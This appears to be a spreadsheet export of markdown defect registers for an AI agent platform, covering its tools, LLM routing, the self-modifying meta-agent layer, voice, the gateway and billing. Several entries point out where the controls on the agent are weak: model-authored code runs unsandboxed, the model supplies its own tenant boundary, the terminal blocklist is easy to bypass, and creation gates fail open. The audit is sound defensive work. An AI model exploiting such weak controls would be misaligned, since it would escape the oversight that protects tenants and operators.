&gt; [`09-tools.md`](../09-tools.md) — the registry, the contract, the catalogue, costing and
&gt; the management API.
&gt; **⚠️ This file is a summary and a set of additions. The authoritative deep pass is
&gt; [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — 49 verified defects across the same
&gt; subsystem.** Do not fix from this file alone; open that one.
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
---</t>
  </si>
  <si>
    <t>CTX-098</t>
  </si>
  <si>
    <t>## How to read this file
The tool layer already has the deepest register in the set. Rather than restate its 49
entries, this file does three things:
1. **[§2](#2-what-the-deep-register-covers)** — maps `09-tools.md` onto the deep register
   so you can find the right entry from the document you were reading.
2. **[§3](#3-additions-not-in-the-deep-register)** — six defects found at doc-09 scope on
   2026-09-01 that the deep pass did not record. One of them
   ([TX-01](#tx-01--the-per-company-sandbox-flag-is-never-read)) materially changes how
   [TL-01](TOOL-LAYER-DEFECTS.md#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user)
   should be fixed.
3. **[§4](#4-improvements)** — efficiency improvements, which the deep register does not
   cover. It is a defect list; this section is the other half of the brief.
Labels are the same: **✅ Verified** means the code was read on 2026-09-01.
---</t>
  </si>
  <si>
    <t>CTX-099</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [What the deep register covers](#2-what-the-deep-register-covers)
3. [Additions not in the deep register](#3-additions-not-in-the-deep-register)
4. [Improvements](#4-improvements)
5. [Suggested order of work](#5-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-100</t>
  </si>
  <si>
    <t>## 1. Summary
| Source | Count |
|---|---|
| [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — the deep pass | **49 defects**, all verified |
| This file — additions at doc-09 scope | **6 defects** |
| This file — efficiency improvements | **10** |
The four root faults from the deep register still hold and are the right frame for all
55 defects:
| Fault | One line |
|---|---|
| **A** | Two registries that never meet — the in-code one and `tool_registry_entries` |
| **B** | Tenancy is a convention, not a boundary |
| **C** | Policy declared in one place, enforced in none |
| **D** | The contract is a string with four dispatch paths |
[TX-01](#tx-01--the-per-company-sandbox-flag-is-never-read) below is a fifth instance of
fault **C**, and the most consequential one found since.
---</t>
  </si>
  <si>
    <t>CTX-101</t>
  </si>
  <si>
    <t>2. What the deep register covers</t>
  </si>
  <si>
    <t>## 2. What the deep register covers
Use this to jump from a section of `09-tools.md` to the entry that describes what is
wrong with it.
| `09-tools.md` section | Deep register entries |
|---|---|
| §2 The tool registry | [TL-10](TOOL-LAYER-DEFECTS.md#tl-10--tenant-scoped-tools-are-unreachable-by-construction), [TL-13](TOOL-LAYER-DEFECTS.md#tl-13--the-tool-status-gate-is-not-wired-into-execution), [TL-14](TOOL-LAYER-DEFECTS.md#tl-14--is_enabled--false-does-not-disable-anything), [TL-34](TOOL-LAYER-DEFECTS.md#tl-34--metadata-drift-between-code-and-db-is-permanent-by-design) |
| §3 The tool contract | [TL-05](TOOL-LAYER-DEFECTS.md#tl-05--the-typed-dispatch-path-silently-drops-execution-context-in-scraper_tool), [TL-30](TOOL-LAYER-DEFECTS.md#4-t2--delete), [TL-41](TOOL-LAYER-DEFECTS.md#tl-41--four-dispatch-paths-and-the-typed-one-fails-silently) |
| §5 The catalogue | [TL-23](TOOL-LAYER-DEFECTS.md#4-t2--delete) to [TL-27](TOOL-LAYER-DEFECTS.md#4-t2--delete), [TL-35](TOOL-LAYER-DEFECTS.md#tl-35--_builtin_categories-covers-22-of-98-tools) |
| §7 `documents/` | [TL-03](TOOL-LAYER-DEFECTS.md#tl-03--llm-supplied-company_id-is-accepted-as-the-tenant-boundary), [TL-26](TOOL-LAYER-DEFECTS.md#4-t2--delete), [TL-27](TOOL-LAYER-DEFECTS.md#4-t2--delete) |
| §8 `email/` | [TL-04](TOOL-LAYER-DEFECTS.md#tl-04--email_send-lets-the-model-override-the-smtp-server-and-password), [TL-09](TOOL-LAYER-DEFECTS.md#tl-09--subject-data-is-model-chosen-with-no-ownership-check), [TL-39](TOOL-LAYER-DEFECTS.md#tl-39--no-idempotency-on-any-write-tool) |</t>
  </si>
  <si>
    <t>| §9 `media/` | [TL-17](TOOL-LAYER-DEFECTS.md#tl-17--the-video-tools-write-outside-the-bind-mount), [TL-31](TOOL-LAYER-DEFECTS.md#tl-31--the-accurate-trim-fallback-in-_ffmpeg-raises-valueerror), [TL-32](TOOL-LAYER-DEFECTS.md#tl-32--blocking-sdk-calls-on-the-event-loop-in-video_generate), [TL-46](TOOL-LAYER-DEFECTS.md#tl-46--video_generate-ignores-is_audio_required-and-reports-it-back) |
| §10 `social/` | [TL-37](TOOL-LAYER-DEFECTS.md#tl-37--the-social-base-class-never-retries-429-or-5xx), [TL-38](TOOL-LAYER-DEFECTS.md#tl-38--no-pagination-in-any-social-list-call), [TL-40](TOOL-LAYER-DEFECTS.md#tl-40--eight-of-sixteen-platforms-cannot-refresh-their-tokens), and all of [T4](TOOL-LAYER-DEFECTS.md#6-t4--integrations-that-report-false-success) |
| §12 `sandbox/` | [TL-01](TOOL-LAYER-DEFECTS.md#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user), [TL-07](TOOL-LAYER-DEFECTS.md#tl-07--a-process-global-symlink-points-at-whichever-tenant-ran-last), [TL-15](TOOL-LAYER-DEFECTS.md#tl-15--networkpolicy-and-the-egress-proxy-are-wired-to-nothing), [TL-16](TOOL-LAYER-DEFECTS.md#tl-16--the-tenant-workspace-lives-in-tmp-and-is-node-local), [TL-18](TOOL-LAYER-DEFECTS.md#tl-18--chromium-never-enters-the-container), [TL-36](TOOL-LAYER-DEFECTS.md#tl-36--terminal-scans-all-of-tmp-and-mis-attributes-artifacts), [TL-42](TOOL-LAYER-DEFECTS.md#tl-42--the-terminal-blocklist-is-a-speed-bump-not-a-boundary), plus [TX-01](#tx-01--the-per-company-sandbox-flag-is-never-read) below |
| §13 `meta/` | [TL-02](TOOL-LAYER-DEFECTS.md#tl-02--tool-synthesis-executes-generated-code-outside-the-sandbox) |
| §14 `mcp/` | [TL-22](TOOL-LAYER-DEFECTS.md#tl-22--the-mcp-layer-has-no-transport-no-config-and-no-caller) |</t>
  </si>
  <si>
    <t>| §15 `resilience.py` | [TL-37](TOOL-LAYER-DEFECTS.md#tl-37--the-social-base-class-never-retries-429-or-5xx), [TL-39](TOOL-LAYER-DEFECTS.md#tl-39--no-idempotency-on-any-write-tool), and [EP-22](06-EXECUTION-PIPELINE-DEFECTS.md#ep-22--with-the-resilience-flag-off-react-tool-calls-get-no-healing-at-all) |
| §17 Budgets and rate limits | [TL-11](TOOL-LAYER-DEFECTS.md#tl-11--the-only-enforced-rate-limit-is-never-populated), [TL-12](TOOL-LAYER-DEFECTS.md#tl-12--the-per-tool-permission-model-sits-on-a-class-nothing-uses), [TL-21](TOOL-LAYER-DEFECTS.md#tl-21--max_tool_calls-is-a-prompt-string-not-a-limit), [TL-28](TOOL-LAYER-DEFECTS.md#4-t2--delete) |
| §18 Costing | [TL-19](TOOL-LAYER-DEFECTS.md#tl-19--four-price-tables-one-of-which-is-the-unused-source-of-truth), [TL-20](TOOL-LAYER-DEFECTS.md#tl-20--voice-tool-calls-are-unattributed-and-unbilled), [TL-33](TOOL-LAYER-DEFECTS.md#tl-33--a-registry-select-per-tool-call-inside-the-react-loop) |
| §19 Management API | [TL-06](TOOL-LAYER-DEFECTS.md#tl-06--the-tool-registry-read-endpoints-return-every-tenants-rows), [TL-14](TOOL-LAYER-DEFECTS.md#tl-14--is_enabled--false-does-not-disable-anything), [TL-34](TOOL-LAYER-DEFECTS.md#tl-34--metadata-drift-between-code-and-db-is-permanent-by-design), [TL-35](TOOL-LAYER-DEFECTS.md#tl-35--_builtin_categories-covers-22-of-98-tools) |
| §20 Security review | All of [T0](TOOL-LAYER-DEFECTS.md#2-t0--tenant-boundary-and-untrusted-code) |
---</t>
  </si>
  <si>
    <t>CTX-102</t>
  </si>
  <si>
    <t>## 3. Additions not in the deep register</t>
  </si>
  <si>
    <t>CTX-103</t>
  </si>
  <si>
    <t>## 4. Improvements
The deep register is a defect list. These are the efficiency items.</t>
  </si>
  <si>
    <t>CTX-104</t>
  </si>
  <si>
    <t>5. Suggested order of work</t>
  </si>
  <si>
    <t>## 5. Suggested order of work
Follow [`TOOL-LAYER-DEFECTS.md` §7](TOOL-LAYER-DEFECTS.md#7-suggested-execution-order) —
it is the sequenced plan for this subsystem. Two amendments from this file:
| Amendment | Detail |
|---|---|
| **Before step 5 (sandbox hardening)** | Fix [TX-01](#tx-01--the-per-company-sandbox-flag-is-never-read). Flipping the container default while the per-company flag is unread means the flag stays a lie in the other direction |
| **Add to step 6 (one resolution entry point)** | [TX-02](#tx-02--tool-instances-are-process-wide-singletons) and [TX-06](#tx-06--get_tools_for_company-merges-correctly-and-has-no-execution-caller). Both are registry changes and belong in the same commit |
For the improvements, the cheap-and-large ones are
[TX-I3](#tx-i3--delete-twelve-tools-before-optimising-anything) (deletion),
[TX-I10](#tx-i10--async-the-blocking-sdk-calls) (four `to_thread` calls) and
[TX-I1](#tx-i1--cache-tool-prices-per-run) (wire the resolver that already exists).
---</t>
  </si>
  <si>
    <t>CTX-105</t>
  </si>
  <si>
    <t>## Where to go next
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — **the authoritative register for this
  subsystem.**
- [09 — Tools &amp; the tool registry](../09-tools.md) — the source document.
- [06 — Execution pipeline](06-EXECUTION-PIPELINE-DEFECTS.md) — EP-02, EP-07, EP-22 for
  the executor side.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — where the four price
  tables are meant to converge.
- [15 — Governance &amp; HITL](15-GOVERNANCE-AND-HITL-DEFECTS.md) — the feature-flag service
  behind TX-01.
- [18 — Infrastructure](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md) — building the
  `hb-sandbox` and `hb-egress-proxy` images.</t>
  </si>
  <si>
    <t>CTX-106</t>
  </si>
  <si>
    <t>10. LLM Providers, Routing &amp; Integrations — Defect Register</t>
  </si>
  <si>
    <t># 10. LLM Providers, Routing &amp; Integrations — Defect Register
&gt; **What this document is:** defects in which model runs, with whose credentials, and at
&gt; what cost — the integration registry, credential resolution, the adapters and token
&gt; accounting — plus the improvements that would make the layer resilient and correctly
&gt; priced.
&gt; **Source document:** [`10-llm-providers.md`](../10-llm-providers.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this layer has **no retry, no timeout, no fallback and no circuit
&gt; breaker**, despite being named "Router". Every LLM failure propagates straight to the
&gt; caller.
---</t>
  </si>
  <si>
    <t>CTX-107</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `10-llm-providers.md`, not independently re-checked.
- Two groups matter most: [§2](#2-t0--money-and-availability) is money and availability,
  [§3](#3-t1--configuration-that-cannot-work) is configuration a user can set that cannot
  work.
---</t>
  </si>
  <si>
    <t>CTX-108</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Money and availability](#2-t0--money-and-availability)
3. [T1 — Configuration that cannot work](#3-t1--configuration-that-cannot-work)
4. [T2 — Delete](#4-t2--delete)
5. [T3 — Correctness in the adapters](#5-t3--correctness-in-the-adapters)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-109</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--money-and-availability) | Money and availability | 6 | Before the first paying tenant |
| [T1](#3-t1--configuration-that-cannot-work) | Configuration that cannot work | 6 | Before anyone follows the setup guide |
| [T2](#4-t2--delete) | Delete | 4 | **Now** — free |
| [T3](#5-t3--correctness-in-the-adapters) | Correctness in the adapters | 8 | When the provider is next touched |
**Total: 24 defects, 10 improvements.**
The three to read first:
- **[LP-01](#lp-01--cost_unit-per_1k_tokens-over-bills-by-1000)** — a `cost_unit` value
  used in the platform's own credentials guide multiplies every bill by 1000.
- **[LP-03](#lp-03--there-is-no-retry-timeout-or-fallback-anywhere-in-the-llm-layer)** — a
  single 429 from a provider fails the run.
- **[LP-07](#lp-07--any-claude-integration-fails-on-its-first-call)** — the adapter is
  complete, the docs explain how to configure it, and the package is not installed.</t>
  </si>
  <si>
    <t>CTX-110</t>
  </si>
  <si>
    <t>## 2. T0 — Money and availability</t>
  </si>
  <si>
    <t>CTX-111</t>
  </si>
  <si>
    <t>## 3. T1 — Configuration that cannot work</t>
  </si>
  <si>
    <t>CTX-112</t>
  </si>
  <si>
    <t>## 4. T2 — Delete
| ID | Delete | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-113</t>
  </si>
  <si>
    <t>CTX-114</t>
  </si>
  <si>
    <t>## 5. T3 — Correctness in the adapters</t>
  </si>
  <si>
    <t>CTX-115</t>
  </si>
  <si>
    <t>CTX-116</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | LP-I3 / LP-01 | A 1000× billing error, with the wrong value in the platform's own guide |
| **2** | LP-I1 / LP-03 | Retry and timeout. The biggest reliability change available anywhere |
| **3** | LP-09, LP-07 | Add the three missing task types; decide Anthropic's fate |
| **4** | LP-02 / LP-14, LP-13, LP-16 | Delete the zero-cost property and the dead reasoning registry |
| **5** | LP-I4 / LP-06, LP-05 | Close the two under-billing paths |
| **6** | LP-I5, LP-I6 / LP-22 | Model resolution caching and cross-process key invalidation |
| **7** | LP-I2 / LP-08 | Build the fallback router, or delete `routing_mode` |
| **8** | LP-I8 / LP-17, LP-18 | Adapter-level correctness for tool calling |
---</t>
  </si>
  <si>
    <t>CTX-117</t>
  </si>
  <si>
    <t>## Where to go next
- [10 — LLM providers, routing &amp; integrations](../10-llm-providers.md) — the source
  document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — LP-07 is D-12.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — for LP-01, LP-02 and
  LP-06 in the billing context.
- [07 — Planning &amp; critics](07-PLANNING-AND-CRITICS-DEFECTS.md) — the critic ladder that
  routes to Claude.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — for the `embedding` task type
  in LP-09.</t>
  </si>
  <si>
    <t>CTX-118</t>
  </si>
  <si>
    <t>11. Meta-Intelligence &amp; the Meta-Agent Board — Defect Register</t>
  </si>
  <si>
    <t># 11. Meta-Intelligence &amp; the Meta-Agent Board — Defect Register
&gt; **What this document is:** defects in the layer that lets the platform reason about and
&gt; change itself — the seven-role Architecture Board, anti-sprawl, tool synthesis, prompt
&gt; evolution and the MetaIntelligenceTree — plus the improvements that would make it safer
&gt; and cheaper.
&gt; **Source document:** [`11-meta-intelligence.md`](../11-meta-intelligence.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this is the layer that creates entities and writes tools. Its safety model
&gt; is a chain of gates, and **several of those gates fail open** — an exception in the
&gt; checker is treated as "allowed".
---</t>
  </si>
  <si>
    <t>CTX-119</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `11-meta-intelligence.md`, not independently re-checked.
- The safety model here is explicitly documented as gated. What follows is a list of the
  places where a gate is advisory, fails open, or is checking the wrong thing. Read
  [§2](#2-t0--gates-that-do-not-gate) before trusting any row in the safety table of
  `11-meta-intelligence.md` §19.
---</t>
  </si>
  <si>
    <t>CTX-120</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Gates that do not gate](#2-t0--gates-that-do-not-gate)
3. [T1 — Roles that do not do their job](#3-t1--roles-that-do-not-do-their-job)
4. [T2 — Wiring and documentation errors](#4-t2--wiring-and-documentation-errors)
5. [T3 — Silent data loss and tuning traps](#5-t3--silent-data-loss-and-tuning-traps)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-121</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--gates-that-do-not-gate) | Gates that do not gate | 5 | Before enabling any autonomous creation |
| [T1](#3-t1--roles-that-do-not-do-their-job) | Roles that do not do their job | 4 | Before relying on the Board |
| [T2](#4-t2--wiring-and-documentation-errors) | Wiring and documentation errors | 5 | Now — mostly one-line |
| [T3](#5-t3--silent-data-loss-and-tuning-traps) | Silent data loss and tuning traps | 5 | When the area is next touched |
**Total: 19 defects, 10 improvements.**
The three to read first:
- **[MI-01](#mi-01--the-duplicate-check-fails-open)** — the semantic duplicate gate
  returns "not a duplicate" on any exception.
- **[MI-02](#mi-02--antisprawlguard-advises-and-only-one-caller-listens)** — the
  anti-sprawl guard does not block; a single caller chooses to honour it.
- **[MI-06](#mi-06--the-architect-cannot-revise-so-the-critic-loop-cannot-converge)** —</t>
  </si>
  <si>
    <t>the role responsible for acting on critic feedback appends a note and returns.
---</t>
  </si>
  <si>
    <t>CTX-122</t>
  </si>
  <si>
    <t>## 2. T0 — Gates that do not gate</t>
  </si>
  <si>
    <t>CTX-123</t>
  </si>
  <si>
    <t>## 3. T1 — Roles that do not do their job</t>
  </si>
  <si>
    <t>CTX-124</t>
  </si>
  <si>
    <t>## 4. T2 — Wiring and documentation errors
| ID | Problem | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-125</t>
  </si>
  <si>
    <t>CTX-126</t>
  </si>
  <si>
    <t>## 5. T3 — Silent data loss and tuning traps</t>
  </si>
  <si>
    <t>CTX-127</t>
  </si>
  <si>
    <t>CTX-128</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | MI-10, MI-12 | The `similar_id` key mismatch and the README count. Minutes each, and MI-10 blinds a human reviewer today |
| **2** | MI-I1 / MI-01 | Fail closed. Three `except` blocks |
| **3** | MI-I2 / MI-02 | Move anti-sprawl into the creation service so every path is covered |
| **4** | MI-I3 / MI-06, MI-07 | Fix or drop the revise loop. Either way it stops costing three calls for nothing |
| **5** | MI-I6 / MI-05, MI-18 | Make skipped tests visible before anything is promoted on a suite result |
| **6** | MI-16 | Fix the synthesis harness workdir **before** `meta_agent.tool_synthesis_enabled` is ever turned on |
| **7** | MI-I7, MI-I8 | Make the human queues visible; stop dropping rare anti-patterns |
| **8** | MI-I4, MI-I5 | Cache the schema compile; make the reuse scorer able to use its most expensive signal |
---</t>
  </si>
  <si>
    <t>CTX-129</t>
  </si>
  <si>
    <t>## Where to go next
- [11 — Meta-intelligence &amp; the Meta-Agent Board](../11-meta-intelligence.md) — the source
  document.
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — TL-02 and TL-10 for MI-14 and MI-16.
- [06 — Execution pipeline](06-EXECUTION-PIPELINE-DEFECTS.md) — the entity shape the Board
  produces and the DRAFT → ACTIVE lifecycle.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — the tree substrate the
  MetaIntelligenceTree reuses.
- [15 — Governance &amp; HITL](15-GOVERNANCE-AND-HITL-DEFECTS.md) — the feature flags gating
  this whole layer.</t>
  </si>
  <si>
    <t>CTX-130</t>
  </si>
  <si>
    <t>12. Voice, Telephony &amp; Messaging — Defect Register</t>
  </si>
  <si>
    <t># 12. Voice, Telephony &amp; Messaging — Defect Register
&gt; **What this document is:** defects in how a phone call or a WhatsApp message becomes a
&gt; conversation with an LLM — the webhooks, the live-audio path, campaigns, guardrails and
&gt; voice billing — plus the improvements that would make calls cheaper and more reliable.
&gt; **Source document:** [`12-voice-and-telephony.md`](../12-voice-and-telephony.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** voice does **not** run through `AgentLoop`. It has no planner, no critics,
&gt; no memory write-back, no HITL and no per-turn token accounting. Several defects below
&gt; follow directly from that.
---</t>
  </si>
  <si>
    <t>CTX-131</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `12-voice-and-telephony.md`, not independently re-checked.
- Three whole features in this subsystem are **broken end to end**: the inbound credit
  gate, Azure Realtime voice, and WhatsApp AI replies. Each fails in a way that produces a
  plausible-looking log line rather than an error.
---</t>
  </si>
  <si>
    <t>CTX-132</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Broken end to end](#2-t0--broken-end-to-end)
3. [T1 — Money and metering](#3-t1--money-and-metering)
4. [T2 — Controls that are stored and ignored](#4-t2--controls-that-are-stored-and-ignored)
5. [T3 — Correctness and dead ends](#5-t3--correctness-and-dead-ends)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-133</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--broken-end-to-end) | Broken end to end | 4 | **Now** — each is a whole feature |
| [T1](#3-t1--money-and-metering) | Money and metering | 4 | Before charging for calls |
| [T2](#4-t2--controls-that-are-stored-and-ignored) | Controls that are stored and ignored | 5 | Before relying on the control |
| [T3](#5-t3--correctness-and-dead-ends) | Correctness and dead ends | 8 | When the area is next touched |
**Total: 21 defects, 10 improvements.**
The three to read first:
- **[VT-01](#vt-01--the-inbound-credit-gate-has-never-run)** — a `NameError` swallowed by
  a broad `except`, logged as a transient blip. Inbound calls have never been credit-gated.
- **[VT-02](#vt-02--azure-realtime-returns-a-tuple-where-a-session-belongs)** — the whole
  Azure voice provider cannot work.
- **[VT-03](#vt-03--every-whatsapp-ai-reply-is-an-apology)** — a wrong call signature means
  every customer gets the fallback string.</t>
  </si>
  <si>
    <t>CTX-134</t>
  </si>
  <si>
    <t>## 2. T0 — Broken end to end</t>
  </si>
  <si>
    <t>CTX-135</t>
  </si>
  <si>
    <t>## 3. T1 — Money and metering</t>
  </si>
  <si>
    <t>CTX-136</t>
  </si>
  <si>
    <t>## 4. T2 — Controls that are stored and ignored
| ID | Control | Reality | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-137</t>
  </si>
  <si>
    <t>CTX-138</t>
  </si>
  <si>
    <t>## 5. T3 — Correctness and dead ends</t>
  </si>
  <si>
    <t>CTX-139</t>
  </si>
  <si>
    <t>CTX-140</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | VT-01 | One line per handler. Restores a credit gate the platform already believes it has |
| **2** | VT-03 | One argument. Restores WhatsApp AI replies entirely |
| **3** | VT-02 | Connect the Azure session and add the missing converter, or remove the provider from the UI |
| **4** | VT-04 | Repoint or delete the 8002 vhosts and the `STREAMING_HOST` default — **W-1** |
| **5** | VT-I1 / VT-05, VT-I4 / VT-06 | Voice billing that reconciles, and tool calls that are attributed |
| **6** | VT-I3 / VT-16, VT-I5 / VT-07 | Cache invalidation and correct recording attachment |
| **7** | VT-I2 / VT-09, VT-10, VT-14 | Enforce the campaign throttles; decide the lead queue's fate |
| **8** | VT-I9 / VT-13 | DTMF, if the product needs it |
---</t>
  </si>
  <si>
    <t>CTX-141</t>
  </si>
  <si>
    <t>## Where to go next
- [12 — Voice, telephony &amp; messaging](../12-voice-and-telephony.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — VT-01 is D-11, VT-02 is D-18, VT-03 is
  D-19, VT-14 is D-21/D-26, VT-04 is W-1.
- [13 — Gateway &amp; real-time](13-GATEWAY-AND-REALTIME-DEFECTS.md) — the WebSocket handshake
  and the dispatcher behind these handlers.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — the ledger VT-05 and VT-06
  feed.
- [02 — System architecture](02-SYSTEM-ARCHITECTURE-DEFECTS.md) — SA-01 and SA-02 for the
  port-8002 removal.</t>
  </si>
  <si>
    <t>CTX-142</t>
  </si>
  <si>
    <t>13. The Unified Gateway &amp; Real-Time Transport — Defect Register</t>
  </si>
  <si>
    <t># 13. The Unified Gateway &amp; Real-Time Transport — Defect Register
&gt; **What this document is:** defects in the public front door — the reverse proxy, the
&gt; webhook receiver, the internal-event endpoint, audio and video WebSockets and the SSE
&gt; relay — plus the improvements that would make the edge safe to expose and cheap to scale.
&gt; **Source document:** [`13-gateway-and-realtime.md`](../13-gateway-and-realtime.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** everything external reaches the platform through this process. It is the
&gt; only thing between the internet and the API, and **several of its controls are not
&gt; wired**.
---</t>
  </si>
  <si>
    <t>CTX-143</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `13-gateway-and-realtime.md`, not independently re-checked.
- The recurring shape here is a control that exists as an object but was never attached to
  the request path: the rate limiter without its middleware, the auth middleware that
  cannot see WebSockets, the signature validators whose result is ignored.
---</t>
  </si>
  <si>
    <t>CTX-144</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — The edge is not defended](#2-t0--the-edge-is-not-defended)
3. [T1 — Wired to nothing](#3-t1--wired-to-nothing)
4. [T2 — Delete](#4-t2--delete)
5. [T3 — Correctness and scaling](#5-t3--correctness-and-scaling)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-145</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--the-edge-is-not-defended) | The edge is not defended | 5 | **Now** — this is the internet-facing surface |
| [T1](#3-t1--wired-to-nothing) | Wired to nothing | 5 | Before relying on the control |
| [T2](#4-t2--delete) | Delete | 4 | Free |
| [T3](#5-t3--correctness-and-scaling) | Correctness and scaling | 7 | Before a second instance exists |
**Total: 21 defects, 10 improvements.**
The three to read first:
- **[GW-01](#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block)** —
  every validator returns `True`, and a `False` is logged and ignored.
- **[GW-02](#gw-02--rate-limiting-covers-one-route)** — the limiter has no middleware, so
  only the REST proxy is limited. Webhooks and WebSockets are unlimited.
- **[GW-04](#gw-04--the-auth-middleware-never-sees-a-websocket)** — the `/stream/*` branch
  of the auth middleware is dead code for real WebSocket connections.
---</t>
  </si>
  <si>
    <t>CTX-146</t>
  </si>
  <si>
    <t>## 2. T0 — The edge is not defended</t>
  </si>
  <si>
    <t>CTX-147</t>
  </si>
  <si>
    <t>## 3. T1 — Wired to nothing</t>
  </si>
  <si>
    <t>CTX-148</t>
  </si>
  <si>
    <t>CTX-149</t>
  </si>
  <si>
    <t>&gt; Move `close_proxy_client`'s body into the `lifespan` shutdown half rather than deleting
&gt; the behaviour — the client should still be closed.
---</t>
  </si>
  <si>
    <t>CTX-150</t>
  </si>
  <si>
    <t>## 5. T3 — Correctness and scaling</t>
  </si>
  <si>
    <t>CTX-151</t>
  </si>
  <si>
    <t>CTX-152</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | GW-I1 + GW-I2 | One line of Python, two of Apache. Turns a decorative rate limit into a real one |
| **2** | GW-I4 / GW-01 | Fail closed on signatures, then implement the HMACs |
| **3** | GW-I3 / GW-07 + GW-03 | Durable envelopes and delivery-id idempotency, together |
| **4** | GW-I6 / GW-04 | Validate the WebSocket token where the scope exists |
| **5** | GW-I5 / GW-08 | Stop running agent loops in the gateway process |
| **6** | T2 deletions — GW-11 to GW-14 | Free, and GW-14 is part of **W-1** |
| **7** | GW-I7 / GW-18, GW-19 | SSE replay and a real terminal signal; drop the polling loop |
| **8** | GW-I10 / GW-10, GW-21 | Decide on video, and on whether a second instance is coming |
---</t>
  </si>
  <si>
    <t>CTX-153</t>
  </si>
  <si>
    <t>## Where to go next
- [13 — The unified gateway &amp; real-time transport](../13-gateway-and-realtime.md) — the
  source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — GW-01 is D-05, GW-03 is D-31, GW-05 is
  D-32, GW-10 is D-16, GW-17 is D-36.
- [02 — System architecture](02-SYSTEM-ARCHITECTURE-DEFECTS.md) — SA-09, SA-16, SA-17 for
  the same subsystem from the topology side.
- [12 — Voice &amp; telephony](12-VOICE-AND-TELEPHONY-DEFECTS.md) — the handlers behind the
  audio WebSockets.
- [04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md) — AU-11 and AU-13 for the
  gateway's shared secrets.</t>
  </si>
  <si>
    <t>CTX-154</t>
  </si>
  <si>
    <t>14. Billing, Costing &amp; Credits — Defect Register</t>
  </si>
  <si>
    <t># 14. Billing, Costing &amp; Credits — Defect Register
&gt; **What this document is:** defects in how consumption turns into a charge — metering,
&gt; the TB formula, the credit wallet, payments and the cron jobs — plus the improvements
&gt; that would make the money path trustworthy.
&gt; **Source document:** [`14-billing-and-credits.md`](../14-billing-and-credits.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** there are **no paying tenants**, which is the only reason this register is
&gt; not an emergency. Every item in T0 must close before the first one.
---</t>
  </si>
  <si>
    <t>CTX-155</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `14-billing-and-credits.md`, not independently re-checked.
- Two findings reframe the whole subsystem and should be read before anything else:
  - **[BC-05](#bc-05--three-of-the-four-credit-gates-have-no-callers)** — the platform
